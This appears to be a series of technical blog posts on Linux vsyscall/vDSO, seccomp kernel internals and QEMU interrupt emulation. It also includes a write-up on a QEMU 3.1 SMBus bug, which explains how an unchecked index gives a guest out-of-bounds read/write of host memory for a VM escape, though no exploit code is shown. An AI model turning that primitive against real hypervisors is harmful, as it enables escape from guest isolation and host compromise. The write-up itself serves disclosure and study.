<p>After we get the physical address of ‘__vsyscall_page’, we check vsyscall_mode and set the fix-mapped address for the vsyscall page with the __set_fixmap macro. If ‘vsyscall_mode’ is not native, ‘vsyscall_pgprot’ is set to ‘__PAGE_KERNEL_VVAR’, which means user space can only read this page; if it is native, user space can execute it.
Note that both protections allow user space to access this page.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> #define __PAGE_KERNEL_VSYSCALL (__PAGE_KERNEL_RX | _PAGE_USER)
#define __PAGE_KERNEL_VVAR (__PAGE_KERNEL_RO | _PAGE_USER)
</code></pre></div></div>
<p>Here we don’t dig into the ‘__set_fixmap’ function; just know that it maps the vsyscall page’s virtual address to its physical address.</p>
<p>Finally, it checks that the virtual address of the vsyscall page equals ‘VSYSCALL_ADDR’.</p>
<p>Now the start address of the vsyscall page is ffffffffff600000. glibc or the application can call the three system calls through the vsyscall page:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> #define VSYSCALL_ADDR_vgettimeofday 0xffffffffff600000
#define VSYSCALL_ADDR_vtime 0xffffffffff600400
#define VSYSCALL_ADDR_vgetcpu 0xffffffffff600800
</code></pre></div></div>
<p>In emulate mode, an access to the vsyscall page triggers a page fault and ‘emulate_vsyscall’ is called. This function gets the syscall number from the address:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> vsyscall_nr = addr_to_vsyscall_nr(address);
static int addr_to_vsyscall_nr(unsigned long addr)
{
int nr;
if ((addr & ~0xC00UL) != VSYSCALL_ADDR)
return -EINVAL;
nr = (addr & 0xC00UL) >> 10;
if (nr >= 3)
return -EINVAL;
return nr;
}
</code></pre></div></div>
<p>Here we can see only three addresses are valid. This also helps mitigate ROP chains that use the vsyscall page.</p>
<p>After the check, it calls the corresponding system call function.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> switch (vsyscall_nr) {
case 0:
ret = sys_gettimeofday(
(struct timeval __user *)regs->di,
(struct timezone __user *)regs->si);
break;
case 1:
ret = sys_time((time_t __user *)regs->di);
break;
case 2:
ret = sys_getcpu((unsigned __user *)regs->di,
(unsigned __user *)regs->si,
NULL);
break;
}
</code></pre></div></div>
<p>So as we can see here, this emulated vsyscall is even slower than just making the system call directly.</p>
<h3> vDSO </h3>
<p>As I have said, the vsyscall is discarded and replaced by the virtual dynamic shared object (vDSO). The difference between vsyscall and vDSO is that the vDSO is mapped into each process as a shared object at a randomized address, while the vsyscall page is static in memory and has the same address in every process. All userspace applications that dynamically link to glibc use the vDSO automatically. For example:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> root@ubuntu:~# ldd /bin/ls
linux-vdso.so.1 (0x00007ffed38da000)
libselinux.so.1 => /lib/x86_64-linux-gnu/libselinux.so.1 (0x00007fab27f0a000)
libc.so.6 => /lib/x86_64-linux-gnu/libc.so.6 (0x00007fab27b19000)
libpcre.so.3 => /lib/x86_64-linux-gnu/libpcre.so.3
...
</code></pre></div></div>
<p>We can see that the vdso has a different load address every time.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> root@ubuntu:~# cat /proc/self/maps | grep vdso
7ffd2307f000-7ffd23081000 r-xp 00000000 00:00 0 [vdso]
root@ubuntu:~# cat /proc/self/maps | grep vdso
7ffce17c7000-7ffce17c9000 r-xp 00000000 00:00 0 [vdso]
root@ubuntu:~# cat /proc/self/maps | grep vdso
7ffe581ca000-7ffe581cc000 r-xp 00000000 00:00 0 [vdso]
root@ubuntu:~#
</code></pre></div></div>
<p>The vdso is initialized in the ‘init_vdso’ function.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> static int __init init_vdso(void)
{
init_vdso_image(&vdso_image_64);
#ifdef CONFIG_X86_X32_ABI
init_vdso_image(&vdso_image_x32);
#endif
</code></pre></div></div>
<p>‘vdso_image_64/x32’ is defined in a generated source file, arch/x86/entry/vdso/vdso-image-64.c. These source files are generated by the vdso2c program from different source files representing different approaches to making a system call, such as int 0x80, sysenter, etc. The full set of images depends on the kernel configuration.</p>
<p>For example for the x86_64 Linux kernel it will contain vdso_image_64:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> const struct vdso_image vdso_image_64 = {
.data = raw_data,
.size = 8192,
.text_mapping = {
.name = "[vdso]",
.pages = pages,
},
.alt = 3673,
.alt_len = 52,
.sym_vvar_start = -12288,
.sym_vvar_page = -12288,
.sym_hpet_page = -8192,
.sym_pvclock_page = -4096,
};
</code></pre></div></div>
<p>vdso_image contains the data of the vDSO image.</p>
<p>raw_data contains the raw binary code of the 64-bit vDSO system calls, which occupies two pages:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> static struct page *pages[2];
</code></pre></div></div>
<p>‘init_vdso_image’ initializes part of the ‘vdso_image’.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> void __init init_vdso_image(const struct vdso_image *image)
{
int i;
int npages = (image->size) / PAGE_SIZE;
BUG_ON(image->size % PAGE_SIZE != 0);
for (i = 0; i < npages; i++)
image->text_mapping.pages[i] =
virt_to_page(image->data + i*PAGE_SIZE);
apply_alternatives((struct alt_instr *)(image->data + image->alt),
(struct alt_instr *)(image->data + image->alt +
image->alt_len));
}
</code></pre></div></div>
<p>When the kernel loads a binary into memory, it calls ‘arch_setup_additional_pages’, and this function calls ‘map_vdso’.</p>
<p>Note that ‘map_vdso’ also needs to map a vvar region. The vDSO implements four system calls:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> __vdso_clock_gettime;
__vdso_getcpu;
__vdso_gettimeofday;
__vdso_time.
root@ubuntu:~# readelf -s vdso.so
Symbol table '.dynsym' contains 10 entries:
Num: Value Size Type Bind Vis Ndx Name
0: 0000000000000000 0 NOTYPE LOCAL DEFAULT UND
1: 0000000000000a40 619 FUNC WEAK DEFAULT 12 clock_gettime@@LINUX_2.6
2: 0000000000000cb0 352 FUNC GLOBAL DEFAULT 12 __vdso_gettimeofday@@LINUX_2.6
3: 0000000000000cb0 352 FUNC WEAK DEFAULT 12 gettimeofday@@LINUX_2.6
4: 0000000000000e10 21 FUNC GLOBAL DEFAULT 12 __vdso_time@@LINUX_2.6
5: 0000000000000e10 21 FUNC WEAK DEFAULT 12 time@@LINUX_2.6
6: 0000000000000a40 619 FUNC GLOBAL DEFAULT 12 __vdso_clock_gettime@@LINUX_2.6
7: 0000000000000000 0 OBJECT GLOBAL DEFAULT ABS LINUX_2.6
8: 0000000000000e30 41 FUNC GLOBAL DEFAULT 12 __vdso_getcpu@@LINUX_2.6
9: 0000000000000e30 41 FUNC WEAK DEFAULT 12 getcpu@@LINUX_2.6
</code></pre></div></div>
<h3> Experiment </h3>
<p>From the above, we can rank the time cost of the three mechanisms for triggering a system call:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> emulated vsyscall > native syscall > vDSO syscall
</code></pre></div></div>
<p>I wrote a simple program to test the timing.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> #include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <time.h>
#include <unistd.h>
#include <sys/syscall.h>
time_t (*f)(time_t *tloc) = (time_t (*)(time_t *))0xffffffffff600400;
int main(int argc, char **argv)
{
unsigned long i = 0;
if(!strcmp(argv[1], "1")) {
for (i = 0; i < 1000000;++i)
f(NULL);
} else if (!strcmp(argv[1], "2")) {
for (i = 0; i < 1000000;++i)
time(NULL);
} else {
for (i = 0; i < 1000000; ++i)
syscall(SYS_time, NULL);
}
return 0;
}
</code></pre></div></div>
<p>Following are the results, which confirm our conclusion.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> root@ubuntu:~# time ./test1 1
real 0m0.539s
user 0m0.195s
sys 0m0.343s
root@ubuntu:~# time ./test1 3
real 0m0.172s
user 0m0.080s
sys 0m0.092s
root@ubuntu:~# time ./test1 2
real 0m0.002s
user 0m0.000s
sys 0m0.002s
</code></pre></div></div>
Anatomy of the seccomp2019-02-04T00:00:00+00:00http://terenceli.github.io/%E6%8A%80%E6%9C%AF/2019/02/04/seccomp
<h3> Introduction </h3>
<p>The Linux kernel exposes a lot of system calls to userland processes, but not all of them are used by any one process. In most cases a process uses a very limited set of system calls and leaves the rest unused. Allowing a process to call arbitrary system calls is harmful: for example, if a system call the process never uses in normal execution has a security bug, the process can still trigger it. Also, if a process is compromised, the attacker will usually run a piece of shellcode that triggers system calls the process never makes in normal execution (such as execve). So reducing the set of system calls a process can make is useful.</p>
<p>Seccomp filtering is such a mechanism: it specifies a filter for a process’s incoming system calls. Seccomp originated from Secure Computing. At first there was only a strict seccomp mode: once a process was set to strict mode, it could only call the ‘read’, ‘write’, ‘_exit’ and ‘sigreturn’ system calls. Of course this is not flexible and not very useful. Later seccomp added a filter mode. A process can set the seccomp policy to filter mode and load a filter program into the kernel. This filter program is a Berkeley Packet Filter (BPF) program, as with socket filters, except that the data operated on is related to the system call being made: the system call number and the system call arguments. With a BPF program loaded into the kernel, the process can easily express a policy to filter system calls, letting the kernel reject a system call or send a SIGSYS signal to the process. Note that BPF programs can’t dereference pointers, so seccomp can only evaluate the system call arguments directly.</p>
<h3> Framework </h3>
<p>The idea behind seccomp is very simple, as the following picture shows. First, the process sets the seccomp policy to strict or filter mode. This causes the kernel to set the seccomp flag in task_struct, and if the process sets filter mode, the kernel adds the program to a seccomp filter list in task_struct. Later, for every system call the process makes, the kernel checks it against the seccomp filter.</p>
<p><img src="/assets/img/seccomp/1.png" alt="" /></p>
<h3> Usage </h3>
<p>The following code shows the strict seccomp mode usage. By default a process doesn’t enable seccomp, meaning it can call any system call. After setting strict mode, it can only call the four system calls above, so even prctl itself can’t be called.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> #include <stdio.h>
#include <sys/prctl.h>
#include <linux/seccomp.h>
#include <unistd.h>
int main() {
int ret;
ret = prctl(PR_GET_SECCOMP);
if (ret == 0) {
printf("no seccomp enabled!\n");
}
else {
printf("seccomp enabled!\n");
}
prctl(PR_SET_SECCOMP, SECCOMP_MODE_STRICT);
ret = prctl(PR_GET_SECCOMP);
printf("you should not see me!\n");
}
</code></pre></div></div>
<p>Following is the result.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> test@ubuntu:~$ ./prctl
no seccomp enabled!
Killed
</code></pre></div></div>
<p>The following code shows the filter mode usage. The BPF instruction spec can be found <a href="https://man.openbsd.org/bpf">here</a>. The BPF program here only allows the prctl and write system calls. Also note that we need to call prctl(PR_SET_NO_NEW_PRIVS) to make sure the current process and its child processes can’t be granted new privileges (for example, by running a setuid binary).</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> #include <stdio.h>
#include <stdlib.h>
#include <sys/prctl.h>
#include <linux/seccomp.h>
#include <unistd.h>
#include <linux/filter.h>
#include <stddef.h>
#include <sys/syscall.h>
int main() {
int ret;
struct sock_filter filter[] = {
BPF_STMT(BPF_LD+BPF_W+BPF_ABS, (offsetof(struct seccomp_data, nr))),
BPF_JUMP(BPF_JMP+BPF_JEQ+BPF_K, __NR_prctl, 0, 1),
BPF_STMT(BPF_RET+BPF_K, SECCOMP_RET_ALLOW),
BPF_JUMP(BPF_JMP+BPF_JEQ+BPF_K, __NR_write, 0, 1),
BPF_STMT(BPF_RET+BPF_K, SECCOMP_RET_ALLOW),
BPF_STMT(BPF_RET+BPF_K, SECCOMP_RET_KILL),
};
struct sock_fprog prog = {
.len = (unsigned short)(sizeof(filter)/sizeof(filter[0])),
.filter = filter,
};
ret = prctl(PR_GET_SECCOMP);
if (ret == 0) {
printf("no seccomp enabled!\n");
}
else {
printf("seccomp enabled!\n");
}
if (prctl(PR_SET_NO_NEW_PRIVS, 1, 0, 0, 0)) {
perror("prctl(NO_NEW_PRIVS)");
exit(1);
}
if (prctl(PR_SET_SECCOMP, SECCOMP_MODE_FILTER, &prog)) {
perror("prctl(SECCOMP)");
exit(1);
}
ret = prctl(PR_GET_SECCOMP);
if (ret == 0) {
printf("no seccomp enabled!\n");
}
else {
printf("seccomp enabled = %d!\n", ret);
}
dup2(1,2);
printf("you should not see me!\n");
return 0;
}
</code></pre></div></div>
<p>Following is the result.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> test@ubuntu:~$ ./filter
no seccomp enabled!
seccomp enabled = 2!
Bad system call (core dumped)
</code></pre></div></div>
<h3> Kernel implementation </h3>
<p>We can use prctl to get/set the seccomp policy; the newer seccomp system call can also be used. The prctl system call is implemented in kernel/sys.c. The function ‘prctl_set_seccomp’ is called when the first argument of prctl is PR_SET_SECCOMP; the code follows.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>long prctl_set_seccomp(unsigned long seccomp_mode, char __user *filter)
{
    unsigned int op;
    char __user *uargs;

    switch (seccomp_mode) {
    case SECCOMP_MODE_STRICT:
        op = SECCOMP_SET_MODE_STRICT;
        /*
         * Setting strict mode through prctl always ignored filter,
         * so make sure it is always NULL here to pass the internal
         * check in do_seccomp().
         */
        uargs = NULL;
        break;
    case SECCOMP_MODE_FILTER:
        op = SECCOMP_SET_MODE_FILTER;
        uargs = filter;
        break;
    default:
        return -EINVAL;
    }

    /* prctl interface doesn't have flags, so they are always zero. */
    return do_seccomp(op, 0, uargs);
}
</code></pre></div></div>
</code></pre></div></div>
<p>It sets ‘op’ according to the seccomp mode and calls do_seccomp.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>static long do_seccomp(unsigned int op, unsigned int flags,
                       const char __user *uargs)
{
    switch (op) {
    case SECCOMP_SET_MODE_STRICT:
        if (flags != 0 || uargs != NULL)
            return -EINVAL;
        return seccomp_set_mode_strict();
    case SECCOMP_SET_MODE_FILTER:
        return seccomp_set_mode_filter(flags, uargs);
    default:
        return -EINVAL;
    }
}
</code></pre></div></div>
</code></pre></div></div>
<p>For strict mode, do_seccomp calls ‘seccomp_set_mode_strict’ directly.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>static long seccomp_set_mode_strict(void)
{
    const unsigned long seccomp_mode = SECCOMP_MODE_STRICT;
    long ret = -EINVAL;

    spin_lock_irq(&current->sighand->siglock);

    if (!seccomp_may_assign_mode(seccomp_mode))
        goto out;

#ifdef TIF_NOTSC
    disable_TSC();
#endif
    seccomp_assign_mode(current, seccomp_mode, 0);
    ret = 0;

out:
    spin_unlock_irq(&current->sighand->siglock);

    return ret;
}
</code></pre></div></div>
</code></pre></div></div>
<p>‘seccomp_may_assign_mode’ makes sure seccomp has not already been set; if it has been set to a mode different from the requested one, it returns false. So once seccomp is set, it can’t be changed to another mode. The seccomp state of a process is stored in the ‘seccomp’ field of task_struct, defined as follows:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>struct seccomp {
    int mode;
    struct seccomp_filter *filter;
};

struct seccomp_filter {
    atomic_t usage;
    struct seccomp_filter *prev;
    struct bpf_prog *prog;
};
</code></pre></div></div>
<p>The ‘mode’ field indicates the seccomp mode, and ‘filter’ links together all of the filters in filter mode.
Once the ‘seccomp_may_assign_mode’ check passes, ‘seccomp_set_mode_strict’ calls ‘seccomp_assign_mode’ to set the seccomp mode. That function just sets ‘task->seccomp.mode’ and sets the ‘TIF_SECCOMP’ flag in ‘task_struct->thread_info->flags’.
If the ‘op’ argument of ‘do_seccomp’ is ‘SECCOMP_SET_MODE_FILTER’, userland wants to set the seccomp mode to filter, and ‘do_seccomp’ calls ‘seccomp_set_mode_filter’.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>static long seccomp_set_mode_filter(unsigned int flags,
                                    const char __user *filter)
{
    const unsigned long seccomp_mode = SECCOMP_MODE_FILTER;
    struct seccomp_filter *prepared = NULL;
    long ret = -EINVAL;

    /* Validate flags. */
    if (flags & ~SECCOMP_FILTER_FLAG_MASK)
        return -EINVAL;

    /* Prepare the new filter before holding any locks. */
    prepared = seccomp_prepare_user_filter(filter);
    if (IS_ERR(prepared))
        return PTR_ERR(prepared);

    /*
     * Make sure we cannot change seccomp or nnp state via TSYNC
     * while another thread is in the middle of calling exec.
     */
    if (flags & SECCOMP_FILTER_FLAG_TSYNC &&
        mutex_lock_killable(&current->signal->cred_guard_mutex))
        goto out_free;

    spin_lock_irq(&current->sighand->siglock);

    if (!seccomp_may_assign_mode(seccomp_mode))
        goto out;

    ret = seccomp_attach_filter(flags, prepared);
    if (ret)
        goto out;
    /* Do not free the successfully attached filter. */
    prepared = NULL;

    seccomp_assign_mode(current, seccomp_mode, flags);
out:
    spin_unlock_irq(&current->sighand->siglock);
    if (flags & SECCOMP_FILTER_FLAG_TSYNC)
        mutex_unlock(&current->signal->cred_guard_mutex);
out_free:
    seccomp_filter_free(prepared);
    return ret;
}
</code></pre></div></div>
</code></pre></div></div>
<p>‘seccomp_prepare_user_filter’ prepares the new filter; it mainly calls ‘seccomp_prepare_filter’, which validates the userland-provided argument and then performs a permission check: as the comment says, the task must have ‘CAP_SYS_ADMIN in its namespace or be running with no_new_privs’ to set seccomp to filter mode.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>static struct seccomp_filter *seccomp_prepare_filter(struct sock_fprog *fprog)
{
    struct seccomp_filter *sfilter;
    int ret;
    const bool save_orig = config_enabled(CONFIG_CHECKPOINT_RESTORE);

    if (fprog->len == 0 || fprog->len > BPF_MAXINSNS)
        return ERR_PTR(-EINVAL);
    BUG_ON(INT_MAX / fprog->len < sizeof(struct sock_filter));

    /*
     * Installing a seccomp filter requires that the task has
     * CAP_SYS_ADMIN in its namespace or be running with no_new_privs.
     * This avoids scenarios where unprivileged tasks can affect the
     * behavior of privileged children.
     */
    if (!task_no_new_privs(current) &&
        security_capable_noaudit(current_cred(), current_user_ns(),
                                 CAP_SYS_ADMIN) != 0)
        return ERR_PTR(-EACCES);

    /* Allocate a new seccomp_filter */
    sfilter = kzalloc(sizeof(*sfilter), GFP_KERNEL | __GFP_NOWARN);
    if (!sfilter)
        return ERR_PTR(-ENOMEM);

    ret = bpf_prog_create_from_user(&sfilter->prog, fprog,
                                    seccomp_check_filter, save_orig);
    if (ret < 0) {
        kfree(sfilter);
        return ERR_PTR(ret);
    }

    atomic_set(&sfilter->usage, 1);
    return sfilter;
}
</code></pre></div></div>
</code></pre></div></div>
<p>‘seccomp_prepare_filter’ then calls ‘bpf_prog_create_from_user’ to copy the filter program from userland into the kernel and sanity-check it.
After preparing a filter, ‘seccomp_set_mode_filter’ calls ‘seccomp_attach_filter’ to attach the filter to the process; this simply links the new filter into the ‘task_struct->seccomp.filter’ list. Finally it sets ‘task_struct->seccomp.mode’ to SECCOMP_MODE_FILTER and sets ‘TIF_SECCOMP’ in ‘task_struct->thread_info->flags’.</p>
<p>Once a process has set a seccomp mode, the system calls it can make are restricted or filtered. On system call entry, the kernel checks ‘_TIF_WORK_SYSCALL_ENTRY’ (arch/x86/entry/entry_64.S); if it is not 0, something must be done before dispatching the system call.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>#define _TIF_WORK_SYSCALL_ENTRY \
    (_TIF_SYSCALL_TRACE | _TIF_SYSCALL_EMU | _TIF_SYSCALL_AUDIT | \
     _TIF_SECCOMP | _TIF_SINGLESTEP | _TIF_SYSCALL_TRACEPOINT | \
     _TIF_NOHZ)
</code></pre></div></div>
<p>Here we can see ‘_TIF_SECCOMP’ is part of ‘_TIF_WORK_SYSCALL_ENTRY’. The entry code first calls ‘syscall_trace_enter_phase1’, which in turn calls ‘seccomp_phase1’.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>u32 seccomp_phase1(struct seccomp_data *sd)
{
    int mode = current->seccomp.mode;
    int this_syscall = sd ? sd->nr :
        syscall_get_nr(current, task_pt_regs(current));

    if (config_enabled(CONFIG_CHECKPOINT_RESTORE) &&
        unlikely(current->ptrace & PT_SUSPEND_SECCOMP))
        return SECCOMP_PHASE1_OK;

    switch (mode) {
    case SECCOMP_MODE_STRICT:
        __secure_computing_strict(this_syscall); /* may call do_exit */
        return SECCOMP_PHASE1_OK;
#ifdef CONFIG_SECCOMP_FILTER
    case SECCOMP_MODE_FILTER:
        return __seccomp_phase1_filter(this_syscall, sd);
#endif
    default:
        BUG();
    }
}
</code></pre></div></div>
</code></pre></div></div>
<p>For strict mode it calls ‘__secure_computing_strict’, which compares ‘this_syscall’ with the four allowed system calls and calls do_exit with SIGKILL if the current syscall is not one of them.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>static void __secure_computing_strict(int this_syscall)
{
    int *syscall_whitelist = mode1_syscalls;
#ifdef CONFIG_COMPAT
    if (is_compat_task())
        syscall_whitelist = mode1_syscalls_32;
#endif
    do {
        if (*syscall_whitelist == this_syscall)
            return;
    } while (*++syscall_whitelist);

#ifdef SECCOMP_DEBUG
    dump_stack();
#endif
    audit_seccomp(this_syscall, SIGKILL, SECCOMP_RET_KILL);
    do_exit(SIGKILL);
}

static int mode1_syscalls_32[] = {
    __NR_seccomp_read_32, __NR_seccomp_write_32,
    __NR_seccomp_exit_32, __NR_seccomp_sigreturn_32,
    0, /* null terminated */
};
</code></pre></div></div>
</code></pre></div></div>
<p>For filter mode, it calls ‘__seccomp_phase1_filter’ to run the filters in ‘task_struct->seccomp.filter’.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>static u32 __seccomp_phase1_filter(int this_syscall, struct seccomp_data *sd)
{
    u32 filter_ret, action;
    int data;

    /*
     * Make sure that any changes to mode from another thread have
     * been seen after TIF_SECCOMP was seen.
     */
    rmb();

    filter_ret = seccomp_run_filters(sd);
    data = filter_ret & SECCOMP_RET_DATA;
    action = filter_ret & SECCOMP_RET_ACTION;

    switch (action) {
    case SECCOMP_RET_ERRNO:
        /* Set low-order bits as an errno, capped at MAX_ERRNO. */
        if (data > MAX_ERRNO)
            data = MAX_ERRNO;
        syscall_set_return_value(current, task_pt_regs(current),
                                 -data, 0);
        goto skip;

    case SECCOMP_RET_TRAP:
        /* Show the handler the original registers. */
        syscall_rollback(current, task_pt_regs(current));
        /* Let the filter pass back 16 bits of data. */
        seccomp_send_sigsys(this_syscall, data);
        goto skip;

    case SECCOMP_RET_TRACE:
        return filter_ret;  /* Save the rest for phase 2. */

    case SECCOMP_RET_ALLOW:
        return SECCOMP_PHASE1_OK;

    case SECCOMP_RET_KILL:
    default:
        audit_seccomp(this_syscall, SIGSYS, action);
        do_exit(SIGSYS);
    }

    unreachable();

skip:
    audit_seccomp(this_syscall, 0, action);
    return SECCOMP_PHASE1_SKIP;
}
</code></pre></div></div>
</code></pre></div></div>
<p>Notice that only ‘SECCOMP_RET_TRACE’ causes ‘syscall_trace_enter_phase2’ to be called in entry_64.S. If the return value is ‘SECCOMP_RET_KILL’, the process exits with the SIGSYS signal.</p>
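<p>The ‘SECCOMP_RET_ACTION’/‘SECCOMP_RET_DATA’ masks used above split a filter's 32-bit return value into a 16-bit action (high half) and 16 bits of data (low half). For instance, a filter that returns SECCOMP_RET_ERRNO | 1 makes the denied syscall fail with errno 1 (EPERM) instead of killing the process. A small sketch of that decomposition (the constant values are copied from the uapi header; the helper names are mine):</p>

```c
#include <stdint.h>

/* Values from include/uapi/linux/seccomp.h. */
#define SECCOMP_RET_ERRNO  0x00050000U
#define SECCOMP_RET_ACTION 0xffff0000U
#define SECCOMP_RET_DATA   0x0000ffffU

/* Split a filter return value the same way __seccomp_phase1_filter()
 * does at the top of its switch. */
static uint32_t ret_action(uint32_t filter_ret)
{
    return filter_ret & SECCOMP_RET_ACTION;
}

static uint32_t ret_data(uint32_t filter_ret)
{
    return filter_ret & SECCOMP_RET_DATA;
}

/* Example return value: fail the syscall with errno 1 (EPERM). */
static uint32_t errno_eperm(void)
{
    return SECCOMP_RET_ERRNO | 1;
}
```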
make QEMU VM escape great again (2018-12-06): http://terenceli.github.io/%E6%8A%80%E6%9C%AF/2018/12/06/qemu-escape
<p>QEMU 3.1 introduced a very serious security issue in its
SMBus implementation.</p>
<p>The corresponding commit is following:</p>
<p><a href="https://git.qemu.org/?p=qemu.git;a=commitdiff;h=38ad4fae43b9c57a4ef3111217b110b25dbd3c50;hp=00bdfeab1584e68bad76034e4ffc33595533fe7d">i2c: pm_smbus: Add block transfer capability</a></p>
<p>And the fix is in <a href="https://git.qemu.org/?p=qemu.git;a=commit;h=f2609ffdf39bcd4f89b5f67b33347490023a7a84">i2c: pm_smbus: check smb_index before block transfer write</a></p>
<p>The issue is in the processing of the SMBHSTSTS command in the smb_ioport_writeb() function.</p>
<p>Here we see that ‘s->smb_index’ is incremented without a bounds check.
The ‘read’ flag comes from ‘s->smb_addr’, which can be controlled with the SMBHSTADD command, so it is easy
to bypass the ‘if (!read…)’ branch. As ‘s->smb_index’ is a uint32_t, we can theoretically drive it
all the way to 0xffffffff. This ‘s->smb_index’ is used to index the memory in ‘s->smb_data’.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>case SMBHSTSTS:
    s->smb_stat &= ~(val & ~STS_HOST_BUSY);
    if (!s->op_done && !(s->smb_auxctl & AUX_BLK)) {
        uint8_t read = s->smb_addr & 0x01;

        s->smb_index++;
        if (!read && s->smb_index == s->smb_data0) {
            uint8_t prot = (s->smb_ctl >> 2) & 0x07;
            uint8_t cmd = s->smb_cmd;
            uint8_t addr = s->smb_addr >> 1;
            int ret;

            if (prot == PROT_I2C_BLOCK_READ) {
                s->smb_stat |= STS_DEV_ERR;
                goto out;
            }

            ret = smbus_write_block(s->smbus, addr, cmd, s->smb_data,
                                    s->smb_data0, !s->i2c_enable);
            if (ret < 0) {
                s->smb_stat |= STS_DEV_ERR;
                goto out;
            }
            s->op_done = true;
            s->smb_stat |= STS_INTR;
            s->smb_stat &= ~STS_HOST_BUSY;
        } else if (!read) {
            s->smb_data[s->smb_index] = s->smb_blkdata;
            s->smb_stat |= STS_BYTE_DONE;
        } else if (s->smb_ctl & CTL_LAST_BYTE) {
            s->op_done = true;
            s->smb_blkdata = s->smb_data[s->smb_index];
            s->smb_index = 0;
            s->smb_stat |= STS_INTR;
            s->smb_stat &= ~STS_HOST_BUSY;
        } else {
            s->smb_blkdata = s->smb_data[s->smb_index];
            s->smb_stat |= STS_BYTE_DONE;
        }
    }
    break;
</code></pre></div></div>
</code></pre></div></div>
<p>Looking at this code snippet more closely, there are three ‘else’ branches after ‘s->smb_index’ is incremented.
The next important piece of data is ‘s->smb_blkdata’, which can be read and written
using the ‘SMBBLKDAT’ command. In the first ‘else’ we can store ‘s->smb_blkdata’ into ‘s->smb_data[s->smb_index]’, which means we can write arbitrary bytes beyond the ‘s->smb_data’ array.
In the second and last ‘else’, ‘s->smb_data[s->smb_index]’ is assigned to ‘s->smb_blkdata’,
which means we can read bytes beyond the ‘s->smb_data’ array.</p>
<p>So we can read/write a large amount of memory (4 GB theoretically) after the ‘s->smb_data’ array. This gives us
plenty of power and room to build an exploit.</p>
<p>Following is the demo of VM escape.</p>
<p><img src="/assets/img/qemues/1.jpg" alt="" /></p>
QEMU interrupt emulation (2018-09-06): http://terenceli.github.io/%E6%8A%80%E6%9C%AF/2018/09/06/qemu-interrupt-emulation
<p>I have written a blog post about KVM interrupt emulation. As we know, QEMU can emulate the whole system; in this post I will discuss how QEMU emulates the interrupt chips of a virtual machine. Here we assume all irqchips are emulated in QEMU, which can be achieved by adding ‘-machine kernel-irqchip=off’ to the QEMU command line.</p>
<h3> Interrupt controller initialization </h3>
<p>The function ‘pc_init1’ first allocates the ‘pcms->gsi’ to represent the interrupt delivery start point.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>pcms->gsi = qemu_allocate_irqs(gsi_handler, gsi_state, GSI_NUM_PINS);

qemu_irq *qemu_allocate_irqs(qemu_irq_handler handler, void *opaque, int n)
{
    return qemu_extend_irqs(NULL, 0, handler, opaque, n);
}

qemu_irq *qemu_extend_irqs(qemu_irq *old, int n_old, qemu_irq_handler handler,
                           void *opaque, int n)
{
    qemu_irq *s;
    int i;

    if (!old) {
        n_old = 0;
    }
    s = old ? g_renew(qemu_irq, old, n + n_old) : g_new(qemu_irq, n);
    for (i = n_old; i < n + n_old; i++) {
        s[i] = qemu_allocate_irq(handler, opaque, i);
    }
    return s;
}
</code></pre></div></div>
</code></pre></div></div>
<p>This function allocates 24 ‘qemu_irq’ structs whose handler is set to ‘gsi_handler’. Here ‘gsi’ is the abbreviation for ‘global system interrupts’.</p>
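<p>Conceptually, a ‘qemu_irq’ is just a (handler, opaque, pin number) triple, and ‘qemu_set_irq(irq, level)’ is nothing more than a call through that handler. A reduced model of what ‘qemu_allocate_irqs’ builds (all names below are illustrative, not QEMU's):</p>

```c
#include <stdlib.h>

/* Reduced model of QEMU's IRQState: a handler plus the pin number
 * the line was allocated for. */
typedef void (*irq_handler)(void *opaque, int n, int level);

typedef struct {
    irq_handler handler;
    void *opaque;
    int n;
} irq;

/* Like qemu_allocate_irqs(): one struct per pin, same handler/opaque. */
static irq *allocate_irqs(irq_handler handler, void *opaque, int count)
{
    irq *s = calloc(count, sizeof(irq));
    for (int i = 0; i < count; i++) {
        s[i].handler = handler;
        s[i].opaque = opaque;
        s[i].n = i;
    }
    return s;
}

/* Like qemu_set_irq(): raising or lowering a line is a handler call. */
static void set_irq(irq *i, int level)
{
    i->handler(i->opaque, i->n, level);
}

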